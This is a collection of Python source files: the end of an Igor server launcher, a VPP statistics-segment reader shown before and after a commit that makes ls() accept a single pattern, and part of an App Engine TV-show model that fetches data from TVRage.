xmlDatabase.DEBUG = True
webApp.DEBUG = True
datadir = args.database
try:
igorServer = IgorServer(datadir, args.port, args.advertise, profile=args.profile)
except IOError, arg:
print >>sys.stderr, '%s: Cannot open database: %s' % (sys.argv[0], arg)
print >>sys.stderr, '%s: Use --help option to see command line arguments' % sys.argv[0]
sys.exit(1)
igorServer.run()
#
# We need to hack the import lock. In case we get here via the easy_install igorServer script
# we are inside an __import__(), and we hold the lock. This means other threads cannot import
# and we hang once a web request comes in. We "work around" this by releasing the lock.
#
hasImportLock = imp.lock_held()
if hasImportLock:
imp.release_lock()
main()
if hasImportLock:
imp.acquire_lock()
|
#!/usr/bin/env python3
#
# Copyright (c) 2021 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
This module implement Python access to the VPP statistics segment. It
accesses the data structures directly in shared memory.
VPP uses optimistic locking, so data structures may change underneath
us while we are reading. Data is copied out and it's important to
spend as little time as possible "holding the lock".
Counters are stored in VPP as a two dimensional array.
Index by thread and index (typically sw_if_index).
Simple counters count only packets, Combined counters count packets
and octets.
Counters can be accessed in either dimension.
stat['/if/rx'] - returns 2D lists
stat['/if/rx'][0] - returns counters for all interfaces for thread 0
stat['/if/rx'][0][1] - returns counter for interface 1 on thread 0
stat['/if/rx'][0][1]['packets'] - returns the packet counter
for interface 1 on thread 0
stat['/if/rx'][:, 1] - returns the counters for interface 1 on all threads
stat['/if/rx'][:, 1].packets() - returns the packet counters for
interface 1 on all threads
stat['/if/rx'][:, 1].sum_packets() - returns the sum of packet counters for
interface 1 on all threads
stat['/if/rx-miss'][:, 1].sum() - returns the sum of packet counters for
interface 1 on all threads for simple counters
'''
import os
import socket
import array
import mmap
from struct import Struct
import time
import unittest
import re
def recv_fd(sock):
'''Get file descriptor for memory map'''
fds = array.array("i") # Array of ints
_, ancdata, _, _ = sock.recvmsg(0, socket.CMSG_LEN(4))
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if cmsg_level == socket.SOL_SOCKET and cmsg_type == socket.SCM_RIGHTS:
fds.frombytes(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
return list(fds)[0]
VEC_LEN_FMT = Struct('I')
def get_vec_len(stats, vector_offset):
'''Equivalent to VPP vec_len()'''
return VEC_LEN_FMT.unpack_from(stats.statseg, vector_offset - 8)[0]
def get_string(stats, ptr):
'''Get a string from a VPP vector'''
namevector = ptr - stats.base
namevectorlen = get_vec_len(stats, namevector)
if namevector + namevectorlen >= stats.size:
raise ValueError('String overruns stats segment')
return stats.statseg[namevector:namevector+namevectorlen-1].decode('ascii')
class StatsVector:
'''A class representing a VPP vector'''
def __init__(self, stats, ptr, fmt):
self.vec_start = ptr - stats.base
self.vec_len = get_vec_len(stats, ptr - stats.base)
self.struct = Struct(fmt)
self.fmtlen = len(fmt)
self.elementsize = self.struct.size
self.statseg = stats.statseg
self.stats = stats
if self.vec_start + self.vec_len * self.elementsize >= stats.size:
raise ValueError('Vector overruns stats segment')
def __iter__(self):
with self.stats.lock:
return self.struct.iter_unpack(self.statseg[self.vec_start:self.vec_start +
self.elementsize*self.vec_len])
def __getitem__(self, index):
if index > self.vec_len:
raise ValueError('Index beyond end of vector')
with self.stats.lock:
if self.fmtlen == 1:
return self.struct.unpack_from(self.statseg, self.vec_start +
(index * self.elementsize))[0]
return self.struct.unpack_from(self.statseg, self.vec_start +
(index * self.elementsize))
class VPPStats():
'''Main class implementing Python access to the VPP statistics segment'''
# pylint: disable=too-many-instance-attributes
shared_headerfmt = Struct('QPQQPP')
default_socketname = '/run/vpp/stats.sock'
def __init__(self, socketname=default_socketname, timeout=10):
self.socketname = socketname
self.timeout = timeout
self.directory = {}
self.lock = StatsLock(self)
self.connected = False
self.size = 0
self.last_epoch = 0
self.error_vectors = 0
self.statseg = 0
def connect(self):
'''Connect to stats segment'''
if self.connected:
return
sock = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
sock.connect(self.socketname)
mfd = recv_fd(sock)
sock.close()
stat_result = os.fstat(mfd)
self.statseg = mmap.mmap(mfd, stat_result.st_size, mmap.PROT_READ, mmap.MAP_SHARED)
socket.close(mfd)
self.size = stat_result.st_size
if self.version != 2:
raise Exception('Incompatbile stat segment version {}'
.format(self.version))
self.refresh()
self.connected = True
def disconnect(self):
'''Disconnect from stats segment'''
if self.connected:
self.statseg.close()
self.connected = False
@property
def version(self):
'''Get version of stats segment'''
return self.shared_headerfmt.unpack_from(self.statseg)[0]
@property
def base(self):
'''Get base pointer of stats segment'''
return self.shared_headerfmt.unpack_from(self.statseg)[1]
@property
def epoch(self):
'''Get current epoch value from stats segment'''
return self.shared_headerfmt.unpack_from(self.statseg)[2]
@property
def in_progress(self):
'''Get value of in_progress from stats segment'''
return self.shared_headerfmt.unpack_from(self.statseg)[3]
@property
def directory_vector(self):
'''Get pointer of directory vector'''
return self.shared_headerfmt.unpack_from(self.statseg)[4]
@property
def error_vector(self):
'''Get pointer of error vector'''
return self.shared_headerfmt.unpack_from(self.statseg)[5]
elementfmt = 'IQ128s'
def refresh(self):
'''Refresh directory vector cache (epoch changed)'''
directory = {}
with self.lock:
for direntry in StatsVector(self, self.directory_vector, self.elementfmt):
path_raw = direntry[2].find(b'\x00')
path = direntry[2][:path_raw].decode('ascii')
directory[path] = StatsEntry(direntry[0], direntry[1])
self.last_epoch = self.epoch
self.directory = directory
# Cache the error index vectors
self.error_vectors = []
for threads in StatsVector(self, self.error_vector, 'P'):
self.error_vectors.append(StatsVector(self, threads[0], 'Q'))
def __getitem__(self, item):
if not self.connected:
self.connect()
if self.last_epoch != self.epoch:
self.refresh()
with self.lock:
return self.directory[item].get_counter(self)
def __iter__(self):
return iter(self.directory.items())
def set_errors(self):
'''Return dictionary of error counters > 0'''
if not self.connected:
self.connect()
errors = {k:v for k, v in self.directory.items() if k.startswith("/err/")}
result = {}
with self.lock:
for k, entry in errors.items():
total = 0
i = entry.value
for per_thread in self.error_vectors:
total += per_thread[i]
if total:
result[k] = total
return result
def set_errors_str(self):
'''Return all errors counters > 0 pretty printed'''
error_string = ['ERRORS:']
error_counters = self.set_errors()
for k in sorted(error_counters):
error_string.append('{:<60}{:>10}'.format(k, error_counters[k]))
return '%s\n' % '\n'.join(error_string)
def get_counter(self, name):
'''Alternative call to __getitem__'''
return self.__getitem__(name)
def get_err_counter(self, name):
'''Return a single value (sum of all threads)'''
if not self.connected:
self.connect()
return sum(self.directory[name].get_counter(self))
def ls(self, patterns):
'''Returns list of counters matching pattern'''
# pylint: disable=invalid-name
if not self.connected:
self.connect()
regex = [re.compile(i) for i in patterns]
return [k for k, v in self.directory.items()
if any(re.match(pattern, k) for pattern in regex)]
def dump(self, counters):
'''Given a list of counters return a dictionary of results'''
if not self.connected:
self.connect()
result = {}
for cnt in counters:
result[cnt] = self.__getitem__(cnt)
return result
class StatsLock():
'''Stat segment optimistic locking'''
def __init__(self, stats):
self.stats = stats
self.epoch = 0
def __enter__(self):
acquired = self.acquire(blocking=True)
assert acquired, "Lock wasn't acquired, but blocking=True"
return self
def __exit__(self, exc_type=None, exc_value=None, traceback=None):
self.release()
def acquire(self, blocking=True, timeout=-1):
'''Acquire the lock. Await in progress to go false. Record epoch.'''
self.epoch = self.stats.epoch
if timeout > 0:
start = time.monotonic()
while self.stats.in_progress:
if not blocking:
time.sleep(0.01)
if timeout > 0:
if start + time.monotonic() > timeout:
return False
return True
def release(self):
'''Check if data read while locked is valid'''
if self.stats.in_progress or self.stats.epoch != self.epoch:
raise IOError('Optimistic lock failed, retry')
def locked(self):
'''Not used'''
class StatsCombinedList(list):
'''Column slicing for Combined counters list'''
def __getitem__(self, item):
'''Supports partial numpy style 2d support. Slice by column [:,1]'''
if isinstance(item, int):
return list.__getitem__(self, item)
return CombinedList([row[item[1]] for row in self])
class CombinedList(list):
'''Combined Counters 2-dimensional by thread by index of packets/octets'''
def packets(self):
'''Return column (2nd dimension). Packets for all threads'''
return [pair[0] for pair in self]
def octets(self):
'''Return column (2nd dimension). Octets for all threads'''
return [pair[1] for pair in self]
def sum_packets(self):
'''Return column (2nd dimension). Sum of all packets for all threads'''
return sum(self.packets())
def sum_octets(self):
'''Return column (2nd dimension). Sum of all octets for all threads'''
return sum(self.octets())
class StatsTuple(tuple):
'''A Combined vector tuple (packets, octets)'''
def __init__(self, data):
self.dictionary = {'packets': data[0], 'bytes': data[1]}
super().__init__()
def __repr__(self):
return dict.__repr__(self.dictionary)
def __getitem__(self, item):
if isinstance(item, int):
return tuple.__getitem__(self, item)
if item == 'packets':
return tuple.__getitem__(self, 0)
return tuple.__getitem__(self, 1)
class StatsSimpleList(list):
'''Simple Counters 2-dimensional by thread by index of packets'''
def __getitem__(self, item):
'''Supports partial numpy style 2d support. Slice by column [:,1]'''
if isinstance(item, int):
return list.__getitem__(self, item)
return SimpleList([row[item[1]] for row in self])
class SimpleList(list):
'''Simple counter'''
def sum(self):
'''Sum the vector'''
return sum(self)
class StatsEntry():
'''An individual stats entry'''
# pylint: disable=unused-argument,no-self-use
def __init__(self, stattype, statvalue):
self.type = stattype
self.value = statvalue
if stattype == 1:
self.function = self.scalar
elif stattype == 2:
self.function = self.simple
elif stattype == 3:
self.function = self.combined
elif stattype == 4:
self.function = self.error
elif stattype == 5:
self.function = self.name
else:
self.function = self.illegal
def illegal(self, stats):
'''Invalid or unknown counter type'''
return None
def scalar(self, stats):
'''Scalar counter'''
return self.value
def simple(self, stats):
'''Simple counter'''
counter = StatsSimpleList()
for threads in StatsVector(stats, self.value, 'P'):
clist = [v[0] for v in StatsVector(stats, threads[0], 'Q')]
counter.append(clist)
return counter
def combined(self, stats):
'''Combined counter'''
counter = StatsCombinedList()
for threads in StatsVector(stats, self.value, 'P'):
clist = [StatsTuple(cnt) for cnt in StatsVector(stats, threads[0], 'QQ')]
counter.append(clist)
return counter
def error(self, stats):
'''Error counter'''
counter = SimpleList()
for clist in stats.error_vectors:
counter.append(clist[self.value])
return counter
def name(self, stats):
'''Name counter'''
counter = []
for name in StatsVector(stats, self.value, 'P'):
counter.append(get_string(stats, name[0]))
return counter
def get_counter(self, stats):
'''Return a list of counters'''
return self.function(stats)
class TestStats(unittest.TestCase):
'''Basic statseg tests'''
def setUp(self):
'''Connect to statseg'''
self.stat = VPPStats()
self.stat.connect()
self.profile = cProfile.Profile()
self.profile.enable()
def tearDown(self):
'''Disconnect from statseg'''
self.stat.disconnect()
profile = Stats(self.profile)
profile.strip_dirs()
profile.sort_stats('cumtime')
profile.print_stats()
print("\n--->>>")
def test_counters(self):
'''Test access to statseg'''
print('/err/abf-input-ip4/missed', self.stat['/err/abf-input-ip4/missed'])
print('/sys/heartbeat', self.stat['/sys/heartbeat'])
print('/if/names', self.stat['/if/names'])
print('/if/rx-miss', self.stat['/if/rx-miss'])
print('/if/rx-miss', self.stat['/if/rx-miss'][1])
print('/nat44-ed/out2in/slowpath/drops', self.stat['/nat44-ed/out2in/slowpath/drops'])
print('Set Errors', self.stat.set_errors())
with self.assertRaises(KeyError):
print('NO SUCH COUNTER', self.stat['foobar'])
print('/if/rx', self.stat.get_counter('/if/rx'))
print('/err/ethernet-input/no error',
self.stat.get_err_counter('/err/ethernet-input/no error'))
def test_column(self):
'''Test column slicing'''
print('/if/rx-miss', self.stat['/if/rx-miss'])
print('/if/rx', self.stat['/if/rx']) # All interfaces for thread #1
print('/if/rx thread #1', self.stat['/if/rx'][0]) # All interfaces for thread #1
print('/if/rx thread #1, interface #1',
self.stat['/if/rx'][0][1]) # All interfaces for thread #1
print('/if/rx if_index #1', self.stat['/if/rx'][:, 1])
print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].packets())
print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].sum_packets())
print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].octets())
print('/if/rx-miss', self.stat['/if/rx-miss'])
print('/if/rx-miss if_index #1 packets', self.stat['/if/rx-miss'][:, 1].sum())
print('/if/rx if_index #1 packets', self.stat['/if/rx'][0][1]['packets'])
def test_error(self):
'''Test the error vector'''
print('/err/ethernet-input', self.stat['/err/ethernet-input/no error'])
print('/err/nat44-ei-ha/pkts-processed', self.stat['/err/nat44-ei-ha/pkts-processed'])
print('/err/ethernet-input', self.stat.get_err_counter('/err/ethernet-input/no error'))
print('/err/ethernet-input', self.stat['/err/ethernet-input/no error'].sum())
def test_nat44(self):
'''Test the nat counters'''
print('/nat44-ei/ha/del-event-recv', self.stat['/nat44-ei/ha/del-event-recv'])
print('/err/nat44-ei-ha/pkts-processed', self.stat['/err/nat44-ei-ha/pkts-processed'].sum())
def test_legacy(self):
'''Legacy interface'''
directory = self.stat.ls(["^/if", "/err/ip4-input", "/sys/node/ip4-input"])
data = self.stat.dump(directory)
print(data)
print('Looking up sys node')
directory = self.stat.ls(["^/sys/node"])
print('Dumping sys node')
data = self.stat.dump(directory)
print(data)
directory = self.stat.ls(["^/foobar"])
data = self.stat.dump(directory)
print(data)
if __name__ == '__main__':
import cProfile
from pstats import Stats
unittest.main()
stats: python: handle when pattern is not list in ls
The reimplementation of python stats module mishandled the case
where pattern to ls was not a list.
Type: fix
Signed-off-by: Ole Troan <aeed71d78dc09e4764ceac69b111eee9b50cfdd0@cisco.com>
Change-Id: I9ba189423a76f2fd4298c4c4b19a0875f705d719
#!/usr/bin/env python3
#
# Copyright (c) 2021 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
This module implement Python access to the VPP statistics segment. It
accesses the data structures directly in shared memory.
VPP uses optimistic locking, so data structures may change underneath
us while we are reading. Data is copied out and it's important to
spend as little time as possible "holding the lock".
Counters are stored in VPP as a two dimensional array.
Index by thread and index (typically sw_if_index).
Simple counters count only packets, Combined counters count packets
and octets.
Counters can be accessed in either dimension.
stat['/if/rx'] - returns 2D lists
stat['/if/rx'][0] - returns counters for all interfaces for thread 0
stat['/if/rx'][0][1] - returns counter for interface 1 on thread 0
stat['/if/rx'][0][1]['packets'] - returns the packet counter
for interface 1 on thread 0
stat['/if/rx'][:, 1] - returns the counters for interface 1 on all threads
stat['/if/rx'][:, 1].packets() - returns the packet counters for
interface 1 on all threads
stat['/if/rx'][:, 1].sum_packets() - returns the sum of packet counters for
interface 1 on all threads
stat['/if/rx-miss'][:, 1].sum() - returns the sum of packet counters for
interface 1 on all threads for simple counters
'''
import os
import socket
import array
import mmap
from struct import Struct
import time
import unittest
import re
def recv_fd(sock):
'''Get file descriptor for memory map'''
fds = array.array("i") # Array of ints
_, ancdata, _, _ = sock.recvmsg(0, socket.CMSG_LEN(4))
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if cmsg_level == socket.SOL_SOCKET and cmsg_type == socket.SCM_RIGHTS:
fds.frombytes(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
return list(fds)[0]
VEC_LEN_FMT = Struct('I')
def get_vec_len(stats, vector_offset):
'''Equivalent to VPP vec_len()'''
return VEC_LEN_FMT.unpack_from(stats.statseg, vector_offset - 8)[0]
def get_string(stats, ptr):
'''Get a string from a VPP vector'''
namevector = ptr - stats.base
namevectorlen = get_vec_len(stats, namevector)
if namevector + namevectorlen >= stats.size:
raise ValueError('String overruns stats segment')
return stats.statseg[namevector:namevector+namevectorlen-1].decode('ascii')
class StatsVector:
'''A class representing a VPP vector'''
def __init__(self, stats, ptr, fmt):
self.vec_start = ptr - stats.base
self.vec_len = get_vec_len(stats, ptr - stats.base)
self.struct = Struct(fmt)
self.fmtlen = len(fmt)
self.elementsize = self.struct.size
self.statseg = stats.statseg
self.stats = stats
if self.vec_start + self.vec_len * self.elementsize >= stats.size:
raise ValueError('Vector overruns stats segment')
def __iter__(self):
with self.stats.lock:
return self.struct.iter_unpack(self.statseg[self.vec_start:self.vec_start +
self.elementsize*self.vec_len])
def __getitem__(self, index):
if index > self.vec_len:
raise ValueError('Index beyond end of vector')
with self.stats.lock:
if self.fmtlen == 1:
return self.struct.unpack_from(self.statseg, self.vec_start +
(index * self.elementsize))[0]
return self.struct.unpack_from(self.statseg, self.vec_start +
(index * self.elementsize))
class VPPStats():
'''Main class implementing Python access to the VPP statistics segment'''
# pylint: disable=too-many-instance-attributes
shared_headerfmt = Struct('QPQQPP')
default_socketname = '/run/vpp/stats.sock'
def __init__(self, socketname=default_socketname, timeout=10):
self.socketname = socketname
self.timeout = timeout
self.directory = {}
self.lock = StatsLock(self)
self.connected = False
self.size = 0
self.last_epoch = 0
self.error_vectors = 0
self.statseg = 0
def connect(self):
'''Connect to stats segment'''
if self.connected:
return
sock = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
sock.connect(self.socketname)
mfd = recv_fd(sock)
sock.close()
stat_result = os.fstat(mfd)
self.statseg = mmap.mmap(mfd, stat_result.st_size, mmap.PROT_READ, mmap.MAP_SHARED)
socket.close(mfd)
self.size = stat_result.st_size
if self.version != 2:
raise Exception('Incompatbile stat segment version {}'
.format(self.version))
self.refresh()
self.connected = True
def disconnect(self):
'''Disconnect from stats segment'''
if self.connected:
self.statseg.close()
self.connected = False
@property
def version(self):
'''Get version of stats segment'''
return self.shared_headerfmt.unpack_from(self.statseg)[0]
@property
def base(self):
'''Get base pointer of stats segment'''
return self.shared_headerfmt.unpack_from(self.statseg)[1]
@property
def epoch(self):
'''Get current epoch value from stats segment'''
return self.shared_headerfmt.unpack_from(self.statseg)[2]
@property
def in_progress(self):
'''Get value of in_progress from stats segment'''
return self.shared_headerfmt.unpack_from(self.statseg)[3]
@property
def directory_vector(self):
'''Get pointer of directory vector'''
return self.shared_headerfmt.unpack_from(self.statseg)[4]
@property
def error_vector(self):
'''Get pointer of error vector'''
return self.shared_headerfmt.unpack_from(self.statseg)[5]
elementfmt = 'IQ128s'
def refresh(self):
'''Refresh directory vector cache (epoch changed)'''
directory = {}
with self.lock:
for direntry in StatsVector(self, self.directory_vector, self.elementfmt):
path_raw = direntry[2].find(b'\x00')
path = direntry[2][:path_raw].decode('ascii')
directory[path] = StatsEntry(direntry[0], direntry[1])
self.last_epoch = self.epoch
self.directory = directory
# Cache the error index vectors
self.error_vectors = []
for threads in StatsVector(self, self.error_vector, 'P'):
self.error_vectors.append(StatsVector(self, threads[0], 'Q'))
def __getitem__(self, item):
if not self.connected:
self.connect()
if self.last_epoch != self.epoch:
self.refresh()
with self.lock:
return self.directory[item].get_counter(self)
def __iter__(self):
return iter(self.directory.items())
def set_errors(self):
'''Return dictionary of error counters > 0'''
if not self.connected:
self.connect()
errors = {k:v for k, v in self.directory.items() if k.startswith("/err/")}
result = {}
with self.lock:
for k, entry in errors.items():
total = 0
i = entry.value
for per_thread in self.error_vectors:
total += per_thread[i]
if total:
result[k] = total
return result
def set_errors_str(self):
'''Return all errors counters > 0 pretty printed'''
error_string = ['ERRORS:']
error_counters = self.set_errors()
for k in sorted(error_counters):
error_string.append('{:<60}{:>10}'.format(k, error_counters[k]))
return '%s\n' % '\n'.join(error_string)
def get_counter(self, name):
'''Alternative call to __getitem__'''
return self.__getitem__(name)
def get_err_counter(self, name):
'''Return a single value (sum of all threads)'''
if not self.connected:
self.connect()
return sum(self.directory[name].get_counter(self))
def ls(self, patterns):
'''Returns list of counters matching pattern'''
# pylint: disable=invalid-name
if not self.connected:
self.connect()
if not isinstance(patterns, list):
patterns = [patterns]
regex = [re.compile(i) for i in patterns]
return [k for k, v in self.directory.items()
if any(re.match(pattern, k) for pattern in regex)]
def dump(self, counters):
'''Given a list of counters return a dictionary of results'''
if not self.connected:
self.connect()
result = {}
for cnt in counters:
result[cnt] = self.__getitem__(cnt)
return result
class StatsLock():
'''Stat segment optimistic locking'''
def __init__(self, stats):
self.stats = stats
self.epoch = 0
def __enter__(self):
acquired = self.acquire(blocking=True)
assert acquired, "Lock wasn't acquired, but blocking=True"
return self
def __exit__(self, exc_type=None, exc_value=None, traceback=None):
self.release()
def acquire(self, blocking=True, timeout=-1):
'''Acquire the lock. Await in progress to go false. Record epoch.'''
self.epoch = self.stats.epoch
if timeout > 0:
start = time.monotonic()
while self.stats.in_progress:
if not blocking:
time.sleep(0.01)
if timeout > 0:
if start + time.monotonic() > timeout:
return False
return True
def release(self):
'''Check if data read while locked is valid'''
if self.stats.in_progress or self.stats.epoch != self.epoch:
raise IOError('Optimistic lock failed, retry')
def locked(self):
'''Not used'''
class StatsCombinedList(list):
'''Column slicing for Combined counters list'''
def __getitem__(self, item):
'''Supports partial numpy style 2d support. Slice by column [:,1]'''
if isinstance(item, int):
return list.__getitem__(self, item)
return CombinedList([row[item[1]] for row in self])
class CombinedList(list):
'''Combined Counters 2-dimensional by thread by index of packets/octets'''
def packets(self):
'''Return column (2nd dimension). Packets for all threads'''
return [pair[0] for pair in self]
def octets(self):
'''Return column (2nd dimension). Octets for all threads'''
return [pair[1] for pair in self]
def sum_packets(self):
'''Return column (2nd dimension). Sum of all packets for all threads'''
return sum(self.packets())
def sum_octets(self):
'''Return column (2nd dimension). Sum of all octets for all threads'''
return sum(self.octets())
class StatsTuple(tuple):
'''A Combined vector tuple (packets, octets)'''
def __init__(self, data):
self.dictionary = {'packets': data[0], 'bytes': data[1]}
super().__init__()
def __repr__(self):
return dict.__repr__(self.dictionary)
def __getitem__(self, item):
if isinstance(item, int):
return tuple.__getitem__(self, item)
if item == 'packets':
return tuple.__getitem__(self, 0)
return tuple.__getitem__(self, 1)
class StatsSimpleList(list):
'''Simple Counters 2-dimensional by thread by index of packets'''
def __getitem__(self, item):
'''Supports partial numpy style 2d support. Slice by column [:,1]'''
if isinstance(item, int):
return list.__getitem__(self, item)
return SimpleList([row[item[1]] for row in self])
class SimpleList(list):
'''Simple counter'''
def sum(self):
'''Sum the vector'''
return sum(self)
class StatsEntry():
'''An individual stats entry'''
# pylint: disable=unused-argument,no-self-use
def __init__(self, stattype, statvalue):
self.type = stattype
self.value = statvalue
if stattype == 1:
self.function = self.scalar
elif stattype == 2:
self.function = self.simple
elif stattype == 3:
self.function = self.combined
elif stattype == 4:
self.function = self.error
elif stattype == 5:
self.function = self.name
else:
self.function = self.illegal
def illegal(self, stats):
'''Invalid or unknown counter type'''
return None
def scalar(self, stats):
'''Scalar counter'''
return self.value
def simple(self, stats):
'''Simple counter'''
counter = StatsSimpleList()
for threads in StatsVector(stats, self.value, 'P'):
clist = [v[0] for v in StatsVector(stats, threads[0], 'Q')]
counter.append(clist)
return counter
def combined(self, stats):
'''Combined counter'''
counter = StatsCombinedList()
for threads in StatsVector(stats, self.value, 'P'):
clist = [StatsTuple(cnt) for cnt in StatsVector(stats, threads[0], 'QQ')]
counter.append(clist)
return counter
def error(self, stats):
'''Error counter'''
counter = SimpleList()
for clist in stats.error_vectors:
counter.append(clist[self.value])
return counter
def name(self, stats):
'''Name counter'''
counter = []
for name in StatsVector(stats, self.value, 'P'):
counter.append(get_string(stats, name[0]))
return counter
def get_counter(self, stats):
'''Return a list of counters'''
return self.function(stats)
class TestStats(unittest.TestCase):
'''Basic statseg tests'''
def setUp(self):
'''Connect to statseg'''
self.stat = VPPStats()
self.stat.connect()
self.profile = cProfile.Profile()
self.profile.enable()
def tearDown(self):
'''Disconnect from statseg'''
self.stat.disconnect()
profile = Stats(self.profile)
profile.strip_dirs()
profile.sort_stats('cumtime')
profile.print_stats()
print("\n--->>>")
def test_counters(self):
'''Test access to statseg'''
print('/err/abf-input-ip4/missed', self.stat['/err/abf-input-ip4/missed'])
print('/sys/heartbeat', self.stat['/sys/heartbeat'])
print('/if/names', self.stat['/if/names'])
print('/if/rx-miss', self.stat['/if/rx-miss'])
print('/if/rx-miss', self.stat['/if/rx-miss'][1])
print('/nat44-ed/out2in/slowpath/drops', self.stat['/nat44-ed/out2in/slowpath/drops'])
print('Set Errors', self.stat.set_errors())
with self.assertRaises(KeyError):
print('NO SUCH COUNTER', self.stat['foobar'])
print('/if/rx', self.stat.get_counter('/if/rx'))
print('/err/ethernet-input/no error',
self.stat.get_err_counter('/err/ethernet-input/no error'))
def test_column(self):
'''Test column slicing'''
print('/if/rx-miss', self.stat['/if/rx-miss'])
print('/if/rx', self.stat['/if/rx']) # All interfaces for thread #1
print('/if/rx thread #1', self.stat['/if/rx'][0]) # All interfaces for thread #1
print('/if/rx thread #1, interface #1',
self.stat['/if/rx'][0][1]) # All interfaces for thread #1
print('/if/rx if_index #1', self.stat['/if/rx'][:, 1])
print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].packets())
print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].sum_packets())
print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].octets())
print('/if/rx-miss', self.stat['/if/rx-miss'])
print('/if/rx-miss if_index #1 packets', self.stat['/if/rx-miss'][:, 1].sum())
print('/if/rx if_index #1 packets', self.stat['/if/rx'][0][1]['packets'])
def test_error(self):
'''Test the error vector'''
print('/err/ethernet-input', self.stat['/err/ethernet-input/no error'])
print('/err/nat44-ei-ha/pkts-processed', self.stat['/err/nat44-ei-ha/pkts-processed'])
print('/err/ethernet-input', self.stat.get_err_counter('/err/ethernet-input/no error'))
print('/err/ethernet-input', self.stat['/err/ethernet-input/no error'].sum())
def test_nat44(self):
'''Test the nat counters'''
print('/nat44-ei/ha/del-event-recv', self.stat['/nat44-ei/ha/del-event-recv'])
print('/err/nat44-ei-ha/pkts-processed', self.stat['/err/nat44-ei-ha/pkts-processed'].sum())
def test_legacy(self):
'''Legacy interface'''
directory = self.stat.ls(["^/if", "/err/ip4-input", "/sys/node/ip4-input"])
data = self.stat.dump(directory)
print(data)
print('Looking up sys node')
directory = self.stat.ls(["^/sys/node"])
print('Dumping sys node')
data = self.stat.dump(directory)
print(data)
directory = self.stat.ls(["^/foobar"])
data = self.stat.dump(directory)
print(data)
def test_sys_nodes(self):
'''Test /sys/nodes'''
counters = self.stat.ls('^/sys/node')
print('COUNTERS:', counters)
print('/sys/node', self.stat.dump(counters))
print('/net/route/to', self.stat['/net/route/to'])
if __name__ == '__main__':
import cProfile
from pstats import Stats
unittest.main()
|
import logging
import re
import datetime
from pytz import utc
from google.appengine.api.labs import taskqueue
from google.appengine.api import memcache
from google.appengine.ext import db
from django.core.urlresolvers import reverse
from helper.string_utils import normalize
from series.tvrage import TVRage
class Show(db.Model):
name = db.StringProperty()
normalized_name = db.StringProperty()
alt_names = db.StringProperty()
slug = db.StringProperty()
description = db.StringProperty(indexed=False)
genres = db.StringProperty(indexed=False)
network = db.StringProperty(indexed=False)
active = db.BooleanProperty()
country = db.StringProperty(indexed=False)
runtime = db.IntegerProperty()
timezone = db.StringProperty(indexed=False)
tvrage_id = db.IntegerProperty()
_memkey_all_shows_ordered = "all_shows_ordered"
_memkey_shows_dict = "all_shows_dict"
re_find_the = re.compile("^The (.*)$")
@classmethod
def kind(cls):
return "series_show"
def __unicode__(self):
return self.name
@property
def idnr(self):
return self.key().id()
def alternative_names(self):
if self.alt_names is None:
return []
return self.alt_names.split("|")
@classmethod
def get_all_ordered(cls):
shows = memcache.get(cls._memkey_all_shows_ordered)
if shows is not None:
return shows
shows = Show.all()
show_list = []
for show in shows:
if len(show.name) > 33:
show.ordered_name = cls.re_find_the.sub("\\1, The", show.name[:33]+"...")
else:
show.ordered_name = cls.re_find_the.sub("\\1, The", show.name)
show_list.append(show)
shows = sorted(show_list, key=lambda x: x.ordered_name)
memcache.set(key=cls._memkey_all_shows_ordered, value=shows)
return shows
@classmethod
def find(cls, show_name):
if not len(show_name):
return None
norm_name = normalize(show_name)
shows = Show.get_all_ordered()
for show in shows:
if show_name == show.name or norm_name == show.normalized_name or \
any([norm_name == alt_name for alt_name in show.alternative_names()]):
return show
@classmethod
def get_all_dict(cls):
show_dict = memcache.get(cls._memkey_shows_dict)
if show_dict is not None:
return show_dict
shows = Show.get_all_ordered()
show_dict = dict([(str(show.key()), show) for show in shows])
memcache.set(key=cls._memkey_shows_dict, value=show_dict)
return show_dict
@classmethod
def clear_cache(cls):
memcache.delete(cls._memkey_all_shows_ordered)
memcache.delete(cls._memkey_shows_dict)
def add_update_task(self):
t = taskqueue.Task(url=reverse('seriesly-shows-update_show'), params={"key": str(self.key())})
t.add(queue_name="series")
return t
def update(self, show_info=None, get_everything=False):
if show_info is None:
tvrage = TVRage()
show_info = tvrage.get_info(self.tvrage_id)
if show_info.name.startswith("'"): # Kill >>'Til Death<< here
show_info.name = show_info.name.replace("'","",1)
attr_list = ["name","network","genres","active","country","runtime","timezone","tvrage_id"]
if self.update_attrs(show_info,attr_list):
self.put()
for season_info in show_info.seasons:
logging.debug("Update or create Season...")
Season.update_or_create(self, season_info, get_everything=get_everything)
def update_attrs(self, info_obj, attr_list):
changed = False
for attr in attr_list:
val = getattr(info_obj, attr)
if val != getattr(self, attr):
setattr(self, attr, val)
changed = True
return changed
def put(self):
self.normalized_name = normalize(self.name)
return super(Show, self).put()
@classmethod
def update_or_create(cls, name, show_id=None):
tvrage = TVRage()
if name is not None:
show_info = tvrage.get_info_by_name(name)
else:
show_info = tvrage.get_info(show_id)
if show_info is None:
return False
logging.debug("Show exists..?")
